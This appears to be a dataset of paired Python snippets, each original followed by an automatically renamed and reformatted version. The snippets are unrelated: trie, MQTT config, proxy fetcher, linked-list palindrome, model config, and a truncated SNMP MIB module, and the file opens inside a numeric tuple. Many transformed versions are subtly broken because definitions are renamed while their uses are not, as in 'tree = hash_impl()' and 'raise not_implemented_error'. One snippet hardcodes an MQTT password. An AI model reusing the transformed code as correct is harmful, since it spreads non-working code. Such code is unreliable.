0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1))
'\nparameters for reproducibiliy. More information: https://numpy.org/doc/stable/reference/random/parallel.html\n'
entropy = 8991598675325360468762009371570610170
child_seed_index = (1, 8) |
#!/usr/bin/env python
class HashImpl(object):
def __init__(self):
self._tree = {}
def insert(self, word):
if word:
t = self._tree
for a in list(word):
if a in t:
t = t[a]
else:
t[a] = {}
t = t[a]
def startsWith(self, word):
if not word:
return True
t = self._tree
for a in list(word):
if a in t:
t = t[a]
else:
return False
return True
def index(self, word):
if not word:
return -1
t = self._tree
for idx, a in enumerate(list(word)):
if a in t:
t = t[a]
else:
return idx
return len(word) - 1
if __name__ == '__main__':
tree = HashImpl()
tree.insert('abc')
tree.insert('abcd')
tree.insert('abce')
tree.insert('bcd')
print('abcdefg', tree.index('abcdefg'))
print('bcefg', tree.index('bcefg'))
| class Hashimpl(object):
def __init__(self):
self._tree = {}
def insert(self, word):
if word:
t = self._tree
for a in list(word):
if a in t:
t = t[a]
else:
t[a] = {}
t = t[a]
def starts_with(self, word):
if not word:
return True
t = self._tree
for a in list(word):
if a in t:
t = t[a]
else:
return False
return True
def index(self, word):
if not word:
return -1
t = self._tree
for (idx, a) in enumerate(list(word)):
if a in t:
t = t[a]
else:
return idx
return len(word) - 1
if __name__ == '__main__':
tree = hash_impl()
tree.insert('abc')
tree.insert('abcd')
tree.insert('abce')
tree.insert('bcd')
print('abcdefg', tree.index('abcdefg'))
print('bcefg', tree.index('bcefg')) |
mqtt_broker = "192.168.10.254"
mqtt_client_id = b"esp_kitchen_servo_switch"
mqtt_topic = b"kitchen/light1"
mqtt_user = "homeassistant"
mqtt_password = "internetofthings"
| mqtt_broker = '192.168.10.254'
mqtt_client_id = b'esp_kitchen_servo_switch'
mqtt_topic = b'kitchen/light1'
mqtt_user = 'homeassistant'
mqtt_password = 'internetofthings' |
# Define Class/ Properties
class IO: # Class
supportedSrcs=["console","file"] #attributes
def read(src): #attributes
if src not in IO.supportedSrcs:
print("Not supported")
else:
print("Read from", src)
# Use class
print(IO.supportedSrcs)
IO.read("file")
IO.read("internet") | class Io:
supported_srcs = ['console', 'file']
def read(src):
if src not in IO.supportedSrcs:
print('Not supported')
else:
print('Read from', src)
print(IO.supportedSrcs)
IO.read('file')
IO.read('internet') |
n = int(input())
time = []
for i in range(n):
time.append(hour+minute)
hour, minute = input().split()
count_max = 1
count = 1
for i in range(1,n):
if time[i] == time[i-1]:
count += 1
else:
count = 1
if count > count_max:
count_max = count
print(count_max) | n = int(input())
time = []
for i in range(n):
time.append(hour + minute)
(hour, minute) = input().split()
count_max = 1
count = 1
for i in range(1, n):
if time[i] == time[i - 1]:
count += 1
else:
count = 1
if count > count_max:
count_max = count
print(count_max) |
class Project:
def __init__(self, name, status="development", inherit=True, view_status="public", description="default"):
self.name = name
self.status = status
self.inherit = inherit
self.view_status = view_status
self.description = description
def __eq__(self, other):
return self.name == other.name
def __repr__(self):
return "Project:name=%s" % (self.name)
def key_by_name(self):
return self.name
| class Project:
def __init__(self, name, status='development', inherit=True, view_status='public', description='default'):
self.name = name
self.status = status
self.inherit = inherit
self.view_status = view_status
self.description = description
def __eq__(self, other):
return self.name == other.name
def __repr__(self):
return 'Project:name=%s' % self.name
def key_by_name(self):
return self.name |
custom_values = {"name": "pinto", "default_code": "p001", "default_value": 100}
new_values = {}
for key, value in custom_values.items():
if 'default_' in key:
new_key = key[8::]
new_values[new_key] = value
else:
new_values[key] = value
print(new_values)
| custom_values = {'name': 'pinto', 'default_code': 'p001', 'default_value': 100}
new_values = {}
for (key, value) in custom_values.items():
if 'default_' in key:
new_key = key[8:]
new_values[new_key] = value
else:
new_values[key] = value
print(new_values) |
class BoardPrecinct():
precinct_map = (
'Upload a PDF file that represent the boundaries of this precinct.'
)
| class Boardprecinct:
precinct_map = 'Upload a PDF file that represent the boundaries of this precinct.' |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
' a test module '
__author__ = 'Ahrli Tao'
IP_URL = 'http://127.0.0.1:6868/proxies/random'
def get_proxies():
url = IP_URL
response = requests.get(url=url)
if response is None:
time.sleep(1)
get_proxies()
proxies_ip = response.text
proxies = {proxies_ip.split(':')[0]: proxies_ip}
return proxies | """ a test module """
__author__ = 'Ahrli Tao'
ip_url = 'http://127.0.0.1:6868/proxies/random'
def get_proxies():
url = IP_URL
response = requests.get(url=url)
if response is None:
time.sleep(1)
get_proxies()
proxies_ip = response.text
proxies = {proxies_ip.split(':')[0]: proxies_ip}
return proxies |
class LinkedList:
def __init__(self, value):
self.value = value
self.next = None
# O(n) time | O(n) space - where n is the number of nodes in the Linked List
def linkedListPalindrome(head):
isPalindromeResults = isPalindrome(head, head)
return isPalindromeResults.outerNodesAreEqual
def isPalindrome(leftNode, rightNode):
if rightNode is None:
return LinkedListInfo(True, leftNode)
recursiveCallResults = isPalindrome(leftNode, rightNode.next)
leftNodeToCompare = recursiveCallResults.leftNodeToCompare
outerNodesAreEqual = recursiveCallResults.outerNodesAreEqual
recursiveIsEqual = outerNodesAreEqual and leftNodeToCompare.value == rightNode.value
nextLeftNodeToCompare = leftNodeToCompare.next
return LinkedListInfo(recursiveIsEqual, nextLeftNodeToCompare)
class LinkedListInfo:
def __init__(self, outerNodesAreEqual, leftNodeToCompare):
self.outerNodesAreEqual = outerNodesAreEqual
self.leftNodeToCompare = leftNodeToCompare | class Linkedlist:
def __init__(self, value):
self.value = value
self.next = None
def linked_list_palindrome(head):
is_palindrome_results = is_palindrome(head, head)
return isPalindromeResults.outerNodesAreEqual
def is_palindrome(leftNode, rightNode):
if rightNode is None:
return linked_list_info(True, leftNode)
recursive_call_results = is_palindrome(leftNode, rightNode.next)
left_node_to_compare = recursiveCallResults.leftNodeToCompare
outer_nodes_are_equal = recursiveCallResults.outerNodesAreEqual
recursive_is_equal = outerNodesAreEqual and leftNodeToCompare.value == rightNode.value
next_left_node_to_compare = leftNodeToCompare.next
return linked_list_info(recursiveIsEqual, nextLeftNodeToCompare)
class Linkedlistinfo:
def __init__(self, outerNodesAreEqual, leftNodeToCompare):
self.outerNodesAreEqual = outerNodesAreEqual
self.leftNodeToCompare = leftNodeToCompare |
_base_ = './htc_r50_fpn_1x_coco.py'
model = dict(
backbone=dict(
depth=101,
init_cfg=dict(type='Pretrained',
checkpoint='torchvision://resnet101')))
# learning policy
lr_config = dict(step=[16, 19])
runner = dict(type='EpochBasedRunner', max_epochs=20)
| _base_ = './htc_r50_fpn_1x_coco.py'
model = dict(backbone=dict(depth=101, init_cfg=dict(type='Pretrained', checkpoint='torchvision://resnet101')))
lr_config = dict(step=[16, 19])
runner = dict(type='EpochBasedRunner', max_epochs=20) |
"""Songs that people need to play back.
"""
class Song:
def get_note_time(self):
""" returns a list of [[note, time], ...]
"""
def load(self, fname):
""" load a song from the given name.
"""
raise NotImplementedError("need to load stuff from some file format. .py .json, etc")
| """Songs that people need to play back.
"""
class Song:
def get_note_time(self):
""" returns a list of [[note, time], ...]
"""
def load(self, fname):
""" load a song from the given name.
"""
raise not_implemented_error('need to load stuff from some file format. .py .json, etc') |
"""
ChatterBot constants
"""
'''
The maximum length of characters that the text of a statement can contain.
This should be enforced on a per-model basis by the data model for each
storage adapter.
'''
STATEMENT_TEXT_MAX_LENGTH = 400
| """
ChatterBot constants
"""
'\nThe maximum length of characters that the text of a statement can contain.\nThis should be enforced on a per-model basis by the data model for each\nstorage adapter.\n'
statement_text_max_length = 400 |
# https://www.hackerrank.com/challenges/triple-sum/problem?isFullScreen=true
def triplets(a, b, c):
a = list(sorted(set(a)))
b = list(sorted(set(b)))
c = list(sorted(set(c)))
ai = 0
bi = 0
ci = 0
ans = 0
while bi < len(b):
while ai < len(a) and a[ai] <= b[bi]:
ai += 1
while ci < len(c) and c[ci] <= b[bi]:
ci += 1
ans += ai * ci
bi += 1
return ans
| def triplets(a, b, c):
a = list(sorted(set(a)))
b = list(sorted(set(b)))
c = list(sorted(set(c)))
ai = 0
bi = 0
ci = 0
ans = 0
while bi < len(b):
while ai < len(a) and a[ai] <= b[bi]:
ai += 1
while ci < len(c) and c[ci] <= b[bi]:
ci += 1
ans += ai * ci
bi += 1
return ans |
def parse(a):
a = a.split("\n")
a = [x+", " for x in a]
a = [''.join(a[i:i+6])+"\n" for i in range(0, len(a), 6)]
print(''.join(a))
| def parse(a):
a = a.split('\n')
a = [x + ', ' for x in a]
a = [''.join(a[i:i + 6]) + '\n' for i in range(0, len(a), 6)]
print(''.join(a)) |
def string_handler(words: str) -> str:
length = len(words)
pos = length // 2
left = words[:pos]
right = words[pos + 1 if length % 2 else pos::][::-1]
return "yes" if left == right else "no"
def main():
while True:
try:
data = input()
print(string_handler(data))
except EOFError:
break
if __name__ == '__main__':
main()
| def string_handler(words: str) -> str:
length = len(words)
pos = length // 2
left = words[:pos]
right = words[pos + 1 if length % 2 else pos:][::-1]
return 'yes' if left == right else 'no'
def main():
while True:
try:
data = input()
print(string_handler(data))
except EOFError:
break
if __name__ == '__main__':
main() |
#!/usr/bin/env python
#title :busy_load.py
#description :Get the busiest or the most loaded disk from a trace
#author :Vincentius Martin
#date :20150203
#version :0.1
#usage :
#notes :
#python_version :2.7.5+
#precondition :ordered
#==============================================================================
def cut(tracefile, lowerb, upperb, devno = -1):
out = open("out/" + tracefile + "-cut.trace", 'w')
lowerb = 60000 * lowerb
upperb = 60000 * upperb
with open("in/" + tracefile) as f:
for line in f:
tok = map(str.lstrip, line.split(" "))
if devno != -1 and int(tok[1]) != devno:
continue
if lowerb <= float(tok[0]) < upperb:
out.write(line)
out.close()
| def cut(tracefile, lowerb, upperb, devno=-1):
out = open('out/' + tracefile + '-cut.trace', 'w')
lowerb = 60000 * lowerb
upperb = 60000 * upperb
with open('in/' + tracefile) as f:
for line in f:
tok = map(str.lstrip, line.split(' '))
if devno != -1 and int(tok[1]) != devno:
continue
if lowerb <= float(tok[0]) < upperb:
out.write(line)
out.close() |
def count_variants(event_log,return_variants=False):
current_case = ""
current_variant = ""
caseIDColName = "Case ID"
activityColName = "Activity"
variants = set()
for index, row in event_log.iterrows():
activity = row[activityColName]
if row[caseIDColName] != current_case:
variants.add(current_variant)
current_variant = ""
current_case = row[caseIDColName]
current_variant = current_variant + "@" + activity
variants.add(current_variant)
if return_variants:
return len(variants) - 1, variants
else:
return len(variants) - 1 | def count_variants(event_log, return_variants=False):
current_case = ''
current_variant = ''
case_id_col_name = 'Case ID'
activity_col_name = 'Activity'
variants = set()
for (index, row) in event_log.iterrows():
activity = row[activityColName]
if row[caseIDColName] != current_case:
variants.add(current_variant)
current_variant = ''
current_case = row[caseIDColName]
current_variant = current_variant + '@' + activity
variants.add(current_variant)
if return_variants:
return (len(variants) - 1, variants)
else:
return len(variants) - 1 |
#
# PySNMP MIB module TIARA-QOS-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/TIARA-QOS-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 21:09:15 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ValueRangeConstraint, ValueSizeConstraint, ConstraintsUnion, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsUnion", "ConstraintsIntersection")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Counter32, ModuleIdentity, TimeTicks, Unsigned32, Gauge32, ObjectIdentity, iso, NotificationType, MibIdentifier, Counter64, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, IpAddress, Bits = mibBuilder.importSymbols("SNMPv2-SMI", "Counter32", "ModuleIdentity", "TimeTicks", "Unsigned32", "Gauge32", "ObjectIdentity", "iso", "NotificationType", "MibIdentifier", "Counter64", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "IpAddress", "Bits")
DisplayString, TextualConvention, TruthValue = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention", "TruthValue")
tiaraIpIfIndex, = mibBuilder.importSymbols("TIARA-IP-MIB", "tiaraIpIfIndex")
tiaraMgmt, = mibBuilder.importSymbols("TIARA-NETWORKS-SMI", "tiaraMgmt")
tiaraQosMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 3174, 2, 17))
tiaraQosMib.setRevisions(('1900-02-07 00:00',))
if mibBuilder.loadTexts: tiaraQosMib.setLastUpdated('0006100000Z')
if mibBuilder.loadTexts: tiaraQosMib.setOrganization('Tiara Networks Inc.')
tiaraRedConfigTable = MibTable((1, 3, 6, 1, 4, 1, 3174, 2, 17, 1), )
if mibBuilder.loadTexts: tiaraRedConfigTable.setStatus('current')
tiaraRedConfigEntry = MibTableRow((1, 3, 6, 1, 4, 1, 3174, 2, 17, 1, 1), ).setIndexNames((0, "TIARA-IP-MIB", "tiaraIpIfIndex"))
if mibBuilder.loadTexts: tiaraRedConfigEntry.setStatus('current')
redTxMaxThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 1, 1, 1), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: redTxMaxThreshold.setStatus('current')
redTxMinThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 1, 1, 2), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: redTxMinThreshold.setStatus('current')
redTxWqBiasFactor = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(3, 20))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: redTxWqBiasFactor.setStatus('current')
redTxEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 1, 1, 4), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: redTxEnable.setStatus('current')
tiaraRedStatTable = MibTable((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2), )
if mibBuilder.loadTexts: tiaraRedStatTable.setStatus('current')
tiaraRedStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1), ).setIndexNames((0, "TIARA-IP-MIB", "tiaraIpIfIndex"))
if mibBuilder.loadTexts: tiaraRedStatEntry.setStatus('current')
redTxLoanedCount = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: redTxLoanedCount.setStatus('current')
redTxMaxLoanedCount = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: redTxMaxLoanedCount.setStatus('current')
redTxAvgQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 3), Counter32()).setMaxAccess("readonly")
